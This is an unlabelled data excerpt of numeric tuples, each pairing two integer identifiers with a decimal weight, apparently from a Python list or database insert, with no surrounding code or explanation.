(260, 173932, 0.91),
(259, 173933, 1.02669),
(260, 173933, 1.02669),
(259, 173934, 1.02669),
(260, 173934, 1.02669),
(259, 173935, 1.12),
(260, 173935, 1.12),
(259, 173936, 1.00331),
(260, 173936, 1.00331),
(259, 173937, 0.98),
(260, 173937, 0.98),
(259, 173938, 0.88669),
(260, 173938, 0.88669),
(262, 173938, 0.88669),
(270, 173938, 0.88669),
(301, 173938, 0.88669),
(259, 173939, 0.98),
(260, 173939, 0.98),
(259, 173940, 0.91),
(260, 173940, 0.91),
(259, 173941, 1.00331),
(260, 173941, 1.00331),
(259, 173942, 0.98),
(260, 173942, 0.98),
(259, 173943, 1.05),
(260, 173943, 1.05),
(259, 173944, 1.02669),
(260, 173944, 1.02669),
(259, 173945, 1.16669),
(260, 173945, 1.16669),
(259, 173946, 1.12),
(260, 173946, 1.12),
(259, 173947, 0.95669),
(260, 173947, 0.95669),
(261, 173947, 2.87007),
(259, 173948, 1.02669),
(260, 173948, 1.02669),
(261, 173948, 1.02669),
(259, 173949, 1.86662),
(260, 173949, 1.86662),
(259, 173950, 1.07331),
(260, 173950, 1.07331),
(259, 173951, 2.87007),
(260, 173951, 2.87007),
(259, 173952, 1.05),
(260, 173952, 1.05),
(259, 173953, 1.05),
(260, 173953, 1.05),
(259, 173954, 1.07331),
(260, 173954, 1.07331),
(259, 173955, 0.98),
(260, 173955, 0.98),
(246, 173956, 1.00331),
(259, 173956, 1.00331),
(260, 173956, 1.00331),
(262, 173956, 1.00331),
(272, 173956, 1.00331),
(274, 173956, 1.00331),
(280, 173956, 1.00331),
(259, 173957, 1.02669),
(260, 173957, 1.02669),
(262, 173957, 2.05338),
(259, 173958, 0.98),
(260, 173958, 0.98),
(259, 173959, 1.05),
(260, 173959, 1.05),
(259, 173960, 0.95669),
(260, 173960, 0.95669),
(259, 173961, 1.09669),
(260, 173961, 1.09669),
(259, 173963, 1.07331),
(260, 173963, 1.07331),
(259, 173964, 1.09669),
(260, 173964, 1.09669),
(174, 175588, 0.88669),
(261, 175588, 0.88669),
(306, 175588, 0.88669),
(174, 175601, 0.91),
(261, 175601, 0.91),
(168, 175946, 0.28),
(261, 175946, 0.28),
(261, 175957, 0.51331),
(268, 175957, 0.51331),
(288, 175957, 0.51331),
(261, 176191, 0.84),
(272, 176191, 0.84),
(280, 176191, 0.84),
(261, 176199, 0.91),
(267, 176199, 0.91),
(272, 176199, 0.91),
(280, 176199, 0.91),
(261, 176200, 1.00331),
(272, 176200, 1.00331),
(280, 176200, 1.00331),
(261, 176201, 1.02669),
(264, 176201, 1.02669),
(261, 176230, 1.02669),
(262, 176230, 1.02669),
(174, 176593, 0.95669),
(244, 176593, 0.95669),
(244, 176596, 0.91),
(246, 176596, 0.91),
(244, 177005, 0.23331),
(265, 177005, 0.23331),
(266, 177005, 0.23331),
(270, 177005, 0.46662),
(301, 177005, 0.46662),
(244, 177303, 0.14),
(264, 177303, 0.14),
(244, 177304, 0.86331),
(264, 177304, 0.86331),
(244, 177311, 0.93331),
(272, 177311, 0.93331),
(280, 177311, 0.93331),
(245, 178605, 0.28),
(263, 178605, 0.28),
(288, 178605, 0.28),
(246, 182843, 0.46669),
(262, 182843, 0.46669),
(161, 189392, 0.28),
(161, 189393, 1.00331),
(161, 189394, 1.09669),
(161, 189395, 0.28),
(161, 189396, 0.98),
(161, 189397, 1.14331),
(161, 189398, 1.05),
(161, 189399, 1.05),
(161, 189400, 1.16669),
(161, 189401, 0.37338),
(161, 189402, 0.95669),
(161, 189403, 1.14331),
(161, 189404, 0.91),
(161, 189405, 1.09669),
(161, 189406, 0.46662),
(161, 189407, 0.95669),
(161, 189408, 1.05),
(161, 189409, 0.98),
(161, 189410, 1.09669),
(161, 189411, 0.28),
(161, 189412, 1.12),
(161, 189413, 1.33),
(161, 189414, 0.32669),
(161, 189415, 0.95669),
(161, 189416, 1.07331),
(161, 189417, 0.56),
(161, 189418, 1.19),
(161, 189419, 1.35331),
(161, 189420, 0.42),
(161, 189421, 1.02669),
(161, 189422, 1.14331),
(161, 189423, 0.46669),
(161, 189424, 1.02669),
(161, 189425, 1.12),
(161, 189426, 0.98),
(161, 189427, 1.09669),
(161, 189428, 0.32669),
(161, 189429, 1.00331),
(161, 189430, 1.16669),
(161, 189431, 2.43661),
(161, 189432, 0.42),
(288, 189432, 0.84),
(161, 189433, 1.02669),
(161, 189434, 1.19),
(161, 189435, 1.00331),
(161, 189436, 1.26),
(161, 189437, 0.74676),
(161, 189438, 0.86331),
(161, 189439, 1.02669),
(161, 189440, 0.98),
(161, 189441, 1.05),
(161, 189442, 0.91),
(161, 189443, 1.02669),
(161, 189444, 0.91),
(161, 189445, 1.02669),
(161, 189446, 0.28),
(161, 189447, 0.91),
(161, 189448, 1.02669),
(161, 189449, 0.42),
(161, 189450, 1.00331),
(161, 189451, 1.19),
(161, 189711, 1.07331),
(161, 189712, 1.35331),
(161, 189713, 0.42),
(161, 189714, 1.02669),
(161, 189715, 1.28331),
(161, 189716, 1.05),
(161, 189717, 1.28331),
(161, 189870, 1.07331),
(161, 189871, 0.93331),
(178, 190689, 0.46669),
(193, 190689, 0.46669),
(174, 190694, 0.32669),
(267, 190694, 0.32669),
(306, 190694, 0.32669),
(193, 190694, 0.98007),
(174, 190695, 0.93331),
(193, 190695, 0.93331),
(306, 190695, 0.93331),
(174, 190696, 1.02669),
(193, 190696, 1.02669),
(193, 190697, 0.95669),
(267, 190697, 0.95669),
(193, 190698, 1.02669),
(267, 190698, 1.02669),
(193, 190701, 0.98),
(267, 190701, 0.98),
(178, 190722, 0.14),
(193, 190722, 0.14),
(273, 190722, 0.14),
(193, 191505, 0.14),
(174, 191919, 0.95669),
(193, 191919, 0.95669),
(193, 191923, 0.98),
(267, 191923, 0.98),
(193, 191945, 0.93331),
(267, 191945, 0.93331),
(292, 191945, 0.93331),
(273, 191945, 4.13323),
(246, 192564, 0.28),
(270, 192564, 0.28),
(301, 192564, 0.28),
(246, 193103, 1.00331),
(269, 193103, 1.00331),
(168, 197608, 0.81669),
(168, 197609, 0.93331),
(168, 197610, 0.81669),
(168, 197611, 0.86331),
(168, 197719, 0.95669),
(168, 197720, 0.98),
(168, 197721, 0.88669),
(168, 197722, 0.98),
(168, 197723, 0.93331),
(168, 197724, 1.00331),
(168, 197725, 0.95669),
(174, 197725, 1.91338),
(168, 197726, 1.09669),
(168, 197727, 1.07331),
(168, 197728, 1.19),
(168, 197729, 0.46669),
(168, 197730, 1.14331),
(168, 197731, 1.33),
(168, 197732, 0.88669),
(287, 197732, 0.88669),
(168, 197733, 1.02669),
(168, 197734, 0.32669),
(269, 197734, 0.32669),
(168, 197735, 0.95669),
(168, 197736, 1.05),
(168, 197737, 0.84),
(168, 197738, 1.00331),
(168, 197739, 1.12),
(168, 197740, 1.12),
(168, 197741, 1.23669),
(168, 197742, 0.42),
(168, 197743, 1.09669),
(168, 197744, 1.19),
(168, 197745, 1.09669),
(168, 197746, 1.21331),
(168, 197747, 1.02669),
(168, 197748, 1.12),
(168, 197749, 0.60669),
(168, 197750, 1.09669),
(168, 197751, 1.14331),
(168, 198168, 0.32669),
(168, 198169, 0.98),
(168, 198170, 1.09669),
(168, 198171, 0.93331),
(168, 198172, 1.00331),
(168, 198173, 0.95669),
(168, 198174, 1.05),
(168, 198175, 0.98),
(168, 198176, 1.05),
(168, 198177, 0.42),
(168, 198178, 0.98),
(168, 198179, 1.16669),
(168, 198180, 0.86331),
(168, 198181, 0.95669),
(168, 198182, 0.95669),
(168, 198183, 1.07331),
(268, 198184, 0.86331),
(168, 198184, 2.95992),
(178, 198184, 2.95992),
(294, 198184, 2.95992),
(168, 198185, 3.6),
(178, 198185, 3.6),
(294, 198185, 3.6),
(168, 198186, 0.28),
(168, 198187, 1.05),
(168, 198188, 1.12),
(168, 198189, 0.51331),
(168, 198190, 1.21331),
(168, 198191, 1.30669),
(168, 198192, 0.95669),
(168, 198193, 1.07331),
(168, 198194, 0.14),
(168, 198195, 0.91),
(168, 198196, 1.02669),
(168, 198197, 0.23331),
(168, 198198, 0.98),
(168, 198199, 1.09669),
(168, 198353, 0.32669),
(168, 198354, 0.93331),
(168, 198355, 1.02669),
(168, 198356, 0.91),
(168, 198357, 0.95669),
(168, 198358, 0.93331),
(168, 198359, 1.02669),
(168, 198360, 0.88669),
(168, 198361, 0.95669),
(168, 198362, 1.07331),
(174, 198362, 1.07331),
(168, 198363, 5.32),
(168, 198364, 1.02669),
(168, 198365, 1.09669),
(168, 198366, 1.12),
(168, 198367, 0.91),
(168, 198368, 1.02669),
(168, 198369, 1.02669),
(168, 198370, 0.98),
(168, 198371, 1.07331),
(168, 198372, 1.07331),
(168, 198373, 1.33),
(168, 198374, 0.93331),
(168, 198375, 1.00331),
(168, 198376, 0.95669),
(168, 198377, 1.02669),
(168, 198378, 1.19),
(168, 198379, 1.09669),
(178, 200810, 0.98),
(272, 200810, 0.98),
(280, 200810, 0.98),
(174, 200810, 1.96),
(174, 200855, 0.95669),
(178, 200855, 0.95669),
(174, 200863, 0.46669),
(178, 200863, 0.46669),
(264, 200863, 0.93338),
(174, 214934, 0.42),
(174, 214935, 0.86331),
(174, 214936, 1.00331),
(174, 214937, 0.84),
(174, 214938, 0.91),
(174, 214939, 0.88669),
(174, 214940, 0.95669),
(174, 215106, 0.86331),
(174, 215107, 0.98),
(174, 215108, 0.91),
(267, 215108, 0.91),
(174, 215109, 1.02669),
(174, 215110, 1.00331),
(174, 215111, 0.84),
(174, 215112, 0.91),
(174, 215113, 1.00331),
(174, 215114, 0.91),
(174, 215115, 1.00331),
(174, 215116, 0.95669),
(174, 215117, 1.05),
(174, 215118, 0.93331),
(174, 215119, 1.05),
(174, 215120, 1.00331),
(174, 215121, 1.16669),
(174, 215122, 0.93331),
(174, 215123, 1.05),
(174, 215124, 0.93331),
(174, 215125, 1.00331),
(174, 215126, 0.88669),
(174, 215127, 1.21331),
(174, 215128, 0.93331),
(174, 215129, 1.14331),
(174, 215130, 0.28),
(174, 215131, 0.91),
(174, 215132, 1.00331),
(174, 215133, 0.91),
(174, 215134, 1.00331),
(174, 215135, 0.91),
(174, 215136, 1.00331),
(174, 215137, 0.88669),
(174, 215138, 0.95669),
(174, 215139, 0.91),
(174, 215140, 0.95669),
(174, 215141, 0.93331),
(174, 215142, 1.12),
(174, 215143, 1.07331),
(174, 215144, 1.19),
(174, 215145, 1.07331),
(174, 215146, 1.07331),
(174, 215147, 1.07331),
(174, 215148, 1.16669),
(174, 215149, 1.02669),
(174, 215150, 1.26),
(174, 215151, 1.00331),
(174, 215152, 1.26),
(174, 215153, 0.95669),
(174, 215154, 1.14331),
(174, 215155, 0.98),
(174, 215156, 1.07331),
(174, 215157, 0.95669),
(174, 215158, 1.07331),
(174, 215159, 0.95669),
(264, 215159, 0.95669),
(174, 215160, 1.05),
(174, 215161, 0.98),
(174, 215162, 1.09669),
(174, 215163, 1.05),
(174, 215164, 3.21993),
(174, 215165, 1.07331),
(174, 215166, 1.02669),
(174, 215167, 1.16669),
(174, 215168, 1.00331),
(174, 215169, 1.14331),
(174, 215170, 0.98),
(174, 215171, 1.09669),
(174, 215172, 0.28),
(174, 215173, 0.93331),
(174, 215174, 1.00331),
(174, 215175, 0.98007),
(174, 215176, 1.00331),
(174, 215177, 1.21331),
(174, 215178, 0.93331),
(174, 215179, 1.05),
(174, 215180, 0.98),
(174, 215181, 1.09669),
(174, 215182, 0.98),
(174, 215183, 1.14331),
(174, 215184, 0.23331),
(174, 215185, 0.93331),
(174, 215186, 1.09669),
(174, 215187, 1.02669),
(174, 215188, 1.05),
(174, 215189, 1.12),
(174, 215190, 1.02669),
(174, 215191, 0.28),
(263, 215191, 0.28),
(275, 215191, 0.28),
(174, 215192, 0.95669),
(174, 215193, 1.02669),
(174, 215194, 1.14331),
(174, 215195, 1.28331),
(174, 215196, 0.46669),
(174, 215197, 1.05),
(174, 215198, 1.14331),
(174, 215199, 0.60669),
(174, 215200, 1.07331),
(174, 215201, 1.16669),
(174, 215202, 0.46669),
(174, 215203, 1.02669),
(174, 215204, 1.16669),
(174, 215205, 0.32669),
(174, 215206, 1.00331),
(174, 215207, 1.16669),
(174, 215208, 0.32669),
(174, 215209, 0.95669),
(174, 215210, 1.02669),
(174, 215211, 0.23331),
(174, 215212, 0.93331),
(174, 215213, 1.02669),
(174, 215707, 0.91),
(174, 215708, 1.00331),
(174, 215709, 0.37331),
(174, 215710, 1.02669),
(174, 215711, 1.16669),
(174, 215712, 0.46669),
(174, 215713, 1.00331),
(174, 215714, 1.19),
(174, 215715, 1.05),
(174, 215716, 1.14331),
(174, 215717, 1.07331),
(174, 215718, 1.14331),
(174, 215719, 1.09669),
(174, 215720, 1.19),
(174, 215721, 1.09669),
(174, 215722, 1.19),
(174, 215723, 2.24),
(174, 215724, 1.21331),
(174, 215725, 1.21331),
(174, 215726, 0.98),
(273, 215726, 0.98),
(174, 215727, 1.19),
(174, 215728, 0.32669),
(174, 215729, 1.02669),
(174, 215730, 1.35331),
(174, 215731, 0.93331),
(174, 215732, 1.05),
(174, 215733, 1.02669),
(174, 215734, 1.05),
(174, 215735, 1.00331),
(174, 215736, 1.07331),
(174, 215737, 2.28662),
(174, 215738, 1.23669),
(174, 215739, 1.26),
(174, 215740, 0.98),
(174, 215741, 1.14331),
(174, 215742, 0.93331),
(174, 215743, 1.00331),
(174, 216067, 0.93331),
(174, 216068, 1.09669),
(174, 216069, 0.98),
(174, 216070, 1.00331),
(174, 216071, 1.02669),
(174, 216072, 1.09669),
(174, 216073, 1.02669),
(174, 216074, 1.02669),
(174, 216075, 0.93331),
(174, 216076, 1.05),
(174, 216077, 1.16669),
(174, 216078, 1.09669),
(174, 216079, 1.02669),
(174, 216080, 0.91),
(174, 216081, 1.00331),
(174, 216082, 0.88669),
(174, 216083, 0.98),
(174, 216084, 1.05),
(174, 216085, 0.98),
(174, 216086, 1.02669),
(174, 216087, 1.02669),
(174, 216088, 1.09669),
(174, 216089, 3.73324),
(174, 216090, 1.02669),
(174, 216091, 1.02669),
(174, 216092, 1.00331),
(174, 216093, 1.05),
(174, 216094, 1.09669),
(174, 216095, 1.19),
(174, 216096, 1.12),
(174, 216097, 1.09669),
(174, 216098, 1.07331),
(174, 216099, 1.07331),
(174, 216100, 1.09669),
(174, 216101, 4.29324),
(174, 216102, 1.14331),
(174, 216103, 1.09669),
(174, 216104, 1.05),
(174, 216105, 1.26),
(174, 216106, 0.95669),
(265, 216106, 0.95669),
(266, 216106, 0.95669),
(287, 216106, 0.95669),
(292, 216106, 0.95669),
(174, 216107, 1.09669),
(174, 216108, 0.98),
(174, 216109, 1.07331),
(174, 216110, 1.02669),
(174, 216111, 0.98),
(174, 216112, 1.05),
(174, 216113, 1.02669),
(262, 217599, 0.18669),
(268, 217599, 0.18669),
(262, 217600, 0.86331),
(268, 217600, 0.86331),
(272, 217997, 0.91),
(280, 217997, 0.91),
(267, 217997, 1.82),
(262, 217997, 2.73),
(178, 221212, 0.81669),
(178, 221213, 0.98),
(178, 221214, 0.88669),
(178, 221215, 0.93331),
(178, 221518, 0.18669),
(290, 221518, 0.18669),
(178, 221519, 0.88669),
(178, 221520, 1.00331),
(178, 221521, 0.91),
(306, 221521, 0.91),
(178, 221522, 0.98),
(178, 221523, 0.88669),
(178, 221524, 0.98),
(178, 221525, 1.96),
(178, 221526, 0.95669),
(178, 221527, 1.86662),
(178, 221528, 0.88669),
(178, 221529, 1.02669),
(178, 221530, 1.02669),
(178, 221531, 1.00331),
(178, 221532, 0.86331),
(178, 221533, 1.00331),
(178, 221534, 0.93331),
(178, 221535, 1.07331),
(178, 221536, 1.77338),
(178, 221537, 2.05338),
(178, 221538, 0.86331),
(178, 221539, 1.00331),
(178, 221540, 0.86331),
(178, 221541, 0.98),
(178, 221542, 1.07331),
(178, 221543, 0.91),
(178, 221544, 1.00331),
(178, 221545, 0.46669),
(178, 221546, 0.98),
(178, 221547, 1.14331),
(178, 221548, 1.07331),
(178, 221549, 1.86662),
(178, 221550, 1.00331),
(178, 221551, 1.05),
(178, 221552, 1.05),
(178, 221553, 1.12),
(178, 221554, 0.46669),
(178, 221555, 0.98),
(178, 221556, 1.14331),
(178, 221557, 0.93331),
(178, 221558, 1.14331),
(178, 221559, 1.14331),
(178, 221560, 1.23669),
(178, 221561, 1.30669),
(178, 221562, 0.98),
(178, 221563, 1.12),
(178, 221564, 0.98),
(178, 221565, 0.98),
(178, 221566, 1.16669),
(178, 221567, 0.60669),
(178, 221568, 1.07331),
(178, 221569, 1.21331),
(178, 221570, 0.37331),
(178, 221571, 0.98),
(178, 221572, 1.02669),
(178, 221573, 0.84),
(178, 221574, 2.00662),
(178, 221575, 1.12),
(178, 221576, 1.14331),
(178, 221577, 1.00331),
(178, 221578, 1.16669),
(178, 221579, 1.09669),
(178, 221580, 1.14331),
(178, 221581, 1.00331),
(178, 221582, 1.14331),
(178, 221583, 2.49339),
(178, 221584, 3.00339),
(178, 221585, 0.56),
(178, 221586, 1.09669),
(178, 221587, 1.16669),
(178, 221588, 0.51331),
(178, 221589, 1.07331),
(178, 221590, 1.30669),
(178, 221591, 0.23331),
(178, 221592, 0.93331),
(178, 221593, 1.05),
(178, 221594, 0.93331),
(178, 221595, 1.12),
(178, 221596, 0.93331),
(178, 221597, 1.00331),
(178, 221598, 0.42),
(178, 221599, 1.09669),
(178, 221600, 1.16669),
(178, 221601, 0.91),
(178, 221602, 0.98),
(178, 221603, 1.77338),
(178, 221604, 1.96),
(178, 221605, 0.91),
(178, 221606, 1.05),
(178, 221607, 0.91),
(178, 221608, 1.00331),
(178, 222603, 1.00331),
(178, 222604, 1.14331),
(178, 222605, 1.49324),
(178, 222606, 2.00662),
(178, 222607, 1.14331),
(178, 222608, 1.09669),
(178, 222609, 0.95669),
(178, 222610, 1.07331),
(178, 222611, 0.95669),
(178, 222612, 1.07331),
(178, 222613, 0.23331),
(178, 222614, 0.93331),
(178, 222615, 1.05),
(178, 222616, 1.68),
(178, 222617, 0.95669),
(178, 222618, 1.07331),
(178, 222619, 0.98),
(178, 222620, 1.16669),
(178, 222621, 0.98),
(178, 222622, 1.12),
(178, 222623, 1.05),
(178, 222624, 1.14331),
(178, 222625, 0.98),
(178, 222626, 1.09669),
(178, 222627, 1.00331),
(178, 222628, 1.05),
(178, 222629, 1.02669),
(178, 222630, 1.09669),
(178, 222631, 0.37331),
(178, 222632, 0.95669),
(178, 222633, 1.12),
(178, 222634, 0.95669),
(178, 222635, 0.98),
(178, 222636, 1.05),
(178, 222637, 1.14331),
(178, 222638, 1.21331),
(178, 222639, 0.28),
(178, 222640, 0.91),
(178, 222641, 1.05),
(178, 222642, 0.91),
(178, 222643, 1.07331),
(178, 223221, 0.91),
(178, 223222, 1.05),
(178, 223223, 1.68),
(178, 223224, 0.95669),
(178, 223225, 0.95669),
(178, 223226, 0.84),
(178, 223227, 1.00331),
(178, 223228, 0.91),
(178, 223229, 1.14331),
(178, 223230, 0.91),
(178, 223231, 1.00331),
(178, 223232, 0.98),
(178, 223233, 0.98),
(178, 223234, 1.07331),
(178, 223235, 0.91),
(178, 223236, 0.98),
(178, 223237, 1.19),
(264, 226739, 0.95669),
(247, 226739, 2.87007),
(263, 227329, 0.18669),
(274, 227329, 0.18669),
(263, 227712, 0.42),
(267, 227712, 0.42),
(265, 227951, 0.91),
(266, 227951, 0.91),
(306, 227951, 0.91),
(263, 227951, 1.82),
(263, 227965, 0.93331),
(272, 227965, 0.93331),
(280, 227965, 0.93331),
(247, 229287, 0.91),
(248, 229287, 0.91),
(247, 229288, 1.12),
(248, 229288, 1.12),
(247, 229290, 0.91),
(275, 229290, 8.32),
(247, 229292, 0.91),
(248, 229292, 0.91),
(269, 229292, 0.91),
(264, 232261, 0.88669),
(270, 232261, 0.88669),
(301, 232261, 0.88669),
(248, 233420, 0.51331),
(265, 233420, 0.51331),
(266, 233420, 0.51331),
(248, 233851, 1.07331),
(269, 233851, 1.07331),
(249, 235476, 0.88669),
(268, 235476, 0.88669),
(249, 235745, 0.84),
(272, 235745, 0.84),
(280, 235745, 0.84),
(265, 236497, 0.60669),
(266, 236497, 0.60669),
(270, 236497, 0.60669),
(301, 236497, 0.60669),
(268, 237054, 0.98),
(270, 237054, 0.98),
(272, 237054, 0.98),
(280, 237054, 0.98),
(301, 237054, 0.98),
(193, 238120, 0.79331),
(305, 238120, 0.79331),
(193, 238121, 0.88669),
(305, 238121, 0.88669),
(193, 238122, 0.86331),
(193, 238123, 0.93331),
(193, 238402, 0.79331),
(193, 238403, 0.98),
(193, 238404, 0.91),
(193, 238405, 1.02669),
(193, 238406, 1.05),
(193, 238407, 0.93331),
(193, 238408, 1.05),
(193, 238409, 0.86331),
(193, 238410, 0.93331),
(193, 238411, 0.86331),
(193, 238412, 0.93331),
(193, 238413, 1.00331),
(193, 238414, 0.93331),
(193, 238415, 1.00331),
(193, 238416, 1.00331),
(193, 238417, 1.12),
(193, 238418, 1.12),
(193, 238419, 1.19),
(193, 238420, 0.93331),
(193, 238421, 1.16669),
(193, 238422, 0.46669),
(193, 238423, 1.00331),
(193, 238424, 1.05),
(193, 238425, 1.02669),
(193, 238426, 1.26),
(193, 238427, 1.12),
(193, 238428, 1.09669),
(193, 238429, 1.19),
(193, 238430, 1.05),
(193, 238431, 1.14331),
(193, 238432, 0.28),
(288, 238432, 0.28),
(193, 238433, 1.02669),
(193, 238434, 1.14331),
(193, 238435, 0.32669),
(193, 238436, 0.95669),
(193, 238437, 1.07331),
(193, 238438, 1.07331),
(193, 238439, 1.14331),
(193, 238440, 1.00331),
(193, 238441, 1.09669),
(193, 238442, 0.98),
(193, 238443, 1.19),
(193, 238444, 1.21331),
(193, 238445, 0.98),
(193, 238446, 1.16669),
(193, 238447, 0.46669),
(193, 238448, 1.00331),
(193, 238449, 1.33),
(193, 238450, 0.32669),
(193, 238451, 0.95669),
(193, 238452, 1.07331),
(193, 238453, 0.93331),
(193, 238454, 1.16669),
(193, 238455, 1.00331),
(193, 238456, 1.21331),
(193, 238457, 0.93331),
(193, 238458, 1.02669),
(193, 238459, 0.95669),
(193, 238460, 1.09669),
(193, 238461, 0.42),
(193, 238462, 0.98),
(193, 238463, 1.05),
(193, 238464, 0.95669),
(193, 238465, 1.05),
(193, 239210, 0.95669),
(193, 239211, 1.07331),
(193, 239212, 1.12),
(193, 239213, 0.95669),
(193, 239214, 1.07331),
(193, 239215, 1.14331),
(193, 239216, 1.23669),
(193, 239217, 0.93331),
(193, 239218, 1.07331),
(193, 239219, 1.00331),
(193, 239220, 1.30669),
(193, 239221, 0.98),
(193, 239222, 1.14331),
(193, 239223, 1.16669),
(193, 239224, 1.26),
(193, 239225, 0.28),
(193, 239226, 0.91),
(193, 239227, 1.07331),
(193, 239228, 2.66007),
(193, 239229, 1.09669),
(193, 239230, 1.96),
(193, 239231, 0.88669),
(193, 239232, 1.09669),
(193, 239619, 0.81669),
(193, 239620, 0.98),
(193, 239621, 1.02669),
(193, 239622, 1.05),
(193, 239623, 0.98),
(193, 239624, 1.07331),
(193, 239625, 0.93331),
(193, 239626, 1.02669),
(193, 239627, 0.95669),
(193, 239628, 1.09669),
(193, 239629, 1.07331),
(193, 239630, 1.05),
(193, 239631, 0.88669),
(193, 239632, 1.00331),
(193, 239633, 1.02669),
(193, 239634, 0.95669),
(193, 239635, 1.02669),
(193, 239636, 1.02669),
(193, 239637, 1.02669),
(193, 239638, 0.88669),
(193, 239639, 1.09669),
(193, 239640, 1.07331),
(193, 239641, 1.05),
(193, 239642, 1.07331),
(193, 239643, 2.58993),
(193, 239644, 1.16669),
(193, 239645, 0.98),
(193, 239646, 0.98),
(193, 239647, 0.98),
(193, 239648, 1.09669),
(193, 239649, 1.00331),
(193, 239650, 0.98),
(193, 239651, 1.00331),
(193, 239652, 1.02669),
(193, 239653, 0.98),
(193, 239654, 0.95669),
(193, 239655, 0.98),
(193, 239656, 1.02669),
(193, 239657, 18.0596),
(193, 239658, 1.05),
(193, 239659, 1.09669),
(193, 239660, 1.07331),
(193, 239661, 1.19),
(193, 239662, 1.07331),
(193, 239663, 1.09669),
(193, 239664, 1.14331),
(193, 239665, 1.07331),
(193, 239666, 1.09669),
(193, 239667, 1.12),
(193, 239668, 1.12),
(193, 239669, 1.19),
(193, 239670, 1.21331),
(193, 239671, 1.09669),
(193, 239672, 1.07331),
(193, 239673, 2.24),
(193, 239674, 1.12),
(193, 239675, 1.02669),
(193, 239676, 1.09669),
(193, 239677, 1.02669),
(193, 239678, 1.12),
(193, 239679, 1.07331),
(193, 239680, 1.23669),
(193, 239681, 3.21993),
(193, 239682, 1.00331),
(193, 239683, 2.87007),
(193, 239684, 1.05),
(193, 239685, 1.02669),
(193, 239686, 1.07331),
(193, 239687, 1.05),
(193, 239688, 1.09669),
(193, 239689, 0.95669),
(193, 239690, 1.00331),
(193, 239691, 1.07331),
(193, 239692, 1.14331),
(193, 239693, 0.91),
(193, 239694, 1.09669),
(193, 239695, 1.82),
(193, 239696, 1.02669),
(193, 239697, 1.00331),
(193, 239698, 1.00331),
(193, 239699, 1.12),
(193, 239700, 0.93331),
(193, 239701, 1.16669),
(193, 239702, 0.98),
(193, 239703, 1.12),
(193, 239704, 1.12),
(193, 239705, 1.05),
(193, 239706, 1.00331),
(193, 239707, 0.95669),
(193, 239708, 1.02669),
(267, 240142, 0.77),
(269, 240142, 0.77),
(267, 240281, 0.37331),
(272, 240281, 0.37331),
(280, 240281, 0.37331),
(267, 240282, 0.98),
(272, 240282, 0.98),
(280, 240282, 0.98),
(265, 249441, 0.93331),
(266, 249441, 0.93331),
(269, 249441, 0.93331),
(265, 249767, 0.32669),
(266, 249767, 0.32669),
(269, 249767, 0.32669),
(265, 249920, 1.02669),
(266, 249920, 1.02669),
(269, 249920, 1.02669),
(270, 250417, 1.77338),
(301, 250417, 1.77338),
(270, 250418, 1.07331),
(301, 250418, 1.07331),
(270, 250419, 0.98),
(301, 250419, 0.98),
(270, 250420, 0.88669),
(301, 250420, 0.88669),
(270, 250421, 1.00331),
(301, 250421, 1.00331),
(270, 250422, 0.98),
(301, 250422, 0.98),
(270, 250423, 0.86331),
(301, 250423, 0.86331),
(270, 250424, 0.95669),
(301, 250424, 0.95669),
(270, 250425, 0.91),
(301, 250425, 0.91),
(270, 250426, 1.02669),
(301, 250426, 1.02669),
(270, 250427, 0.95669),
(301, 250427, 0.95669),
(270, 250428, 0.95669),
(301, 250428, 0.95669),
(270, 250429, 1.07331),
(301, 250429, 1.07331),
(270, 250430, 1.05),
(301, 250430, 1.05),
(270, 250431, 1.00331),
(301, 250431, 1.00331),
(270, 250432, 1.21331),
(301, 250432, 1.21331),
(270, 250433, 1.00331),
(301, 250433, 1.00331),
(270, 250434, 1.12),
(301, 250434, 1.12),
(270, 250435, 0.98),
(301, 250435, 0.98),
(270, 250436, 1.19),
(301, 250436, 1.19),
(270, 250437, 1.09669),
(301, 250437, 1.09669),
(270, 250438, 1.28331),
(301, 250438, 1.28331),
(270, 250439, 1.00331),
(290, 250439, 1.00331),
(301, 250439, 1.00331),
(306, 250439, 1.00331),
(270, 250440, 1.09669),
(301, 250440, 1.09669),
(306, 250440, 1.09669),
(270, 250441, 0.91),
(301, 250441, 0.91),
(270, 250442, 1.02669),
(301, 250442, 1.02669),
(270, 250443, 1.21331),
(301, 250443, 1.21331),
(270, 250444, 1.28331),
(301, 250444, 1.28331),
(270, 250445, 1.09669),
(301, 250445, 1.09669),
(270, 250446, 1.21331),
(301, 250446, 1.21331),
(270, 250447, 1.05),
(301, 250447, 1.05),
(270, 250448, 1.12),
(301, 250448, 1.12),
(290, 250449, 0.51331),
(270, 250449, 1.02662),
(301, 250449, 1.02662),
(270, 250450, 1.07331),
(301, 250450, 1.07331),
(270, 250451, 1.14331),
(301, 250451, 1.14331),
(270, 250452, 1.09669),
(301, 250452, 1.09669),
(270, 250453, 1.23669),
(301, 250453, 1.23669),
(270, 250631, 1.86662),
(301, 250631, 1.86662),
(270, 250632, 2.1),
(301, 250632, 2.1),
(270, 250633, 0.46669),
(301, 250633, 0.46669),
(270, 250634, 1.02669),
(301, 250634, 1.02669),
(270, 250635, 1.09669),
(301, 250635, 1.09669),
(270, 250715, 1.02669),
(301, 250715, 1.02669),
(270, 250716, 0.98),
(301, 250716, 0.98),
(305, 250716, 0.98),
(270, 250717, 1.12),
(301, 250717, 1.12),
(270, 250718, 1.00331),
(301, 250718, 1.00331),
(270, 250719, 1.19),
(301, 250719, 1.19),
(270, 250720, 0.88669),
(301, 250720, 0.88669),
(270, 250721, 0.95669),
(301, 250721, 0.95669),
(270, 250722, 1.09669),
(301, 250722, 1.09669),
(270, 250723, 1.00331),
(301, 250723, 1.00331),
(270, 250724, 1.00331),
(301, 250724, 1.00331),
(270, 250725, 0.95669),
(301, 250725, 0.95669),
(270, 250726, 1.00331),
(301, 250726, 1.00331),
(270, 250727, 0.95669),
(301, 250727, 0.95669),
(270, 250728, 1.19),
(301, 250728, 1.19),
(270, 250729, 0.93331),
(301, 250729, 0.93331),
(270, 250730, 1.26),
(301, 250730, 1.26),
(306, 250731, 0.98),
(270, 250731, 1.96),
(301, 250731, 1.96),
(270, 250732, 1.12),
(301, 250732, 1.12),
(270, 250733, 1.12),
(301, 250733, 1.12),
(270, 250734, 1.07331),
(301, 250734, 1.07331),
(270, 250735, 1.19),
(301, 250735, 1.19),
(270, 250736, 1.09669),
(301, 250736, 1.09669),
(270, 250737, 0.98),
(301, 250737, 0.98),
(270, 250738, 1.09669),
(301, 250738, 1.09669),
(265, 251002, 1.00331),
(266, 251002, 1.00331),
(265, 251003, 0.28),
(266, 251003, 0.28),
(274, 251003, 0.28),
(265, 251004, 0.93331),
(266, 251004, 0.93331),
